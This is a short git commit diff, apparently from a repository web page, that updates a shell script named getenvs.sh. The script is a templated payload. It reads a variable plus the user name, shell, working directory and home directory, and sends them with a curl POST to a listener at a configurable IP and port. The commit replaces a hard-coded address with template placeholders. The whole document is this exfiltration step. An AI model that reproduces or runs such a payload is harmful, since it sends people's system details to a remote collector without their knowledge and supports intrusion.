updated getenvs.sh file
parent
00f7800c68
commit
b2878b72db
|
@ -1,2 +1,2 @@
|
|||
myvariable={{rfsvars["myvariable"]}};
|
||||
curl -X POST -d "recieved=$myvariable&user=$USER&shell=$SHELL&pwd=$PWD&home=$HOME" http://192.168.1.146:5000/l
|
||||
curl -X POST -d "recieved=$myvariable&user=$USER&shell=$SHELL&pwd=$PWD&home=$HOME" http://{{args.ip}}:{{args.port}}/l
|
||||
|
|
Loading…
Reference in New Issue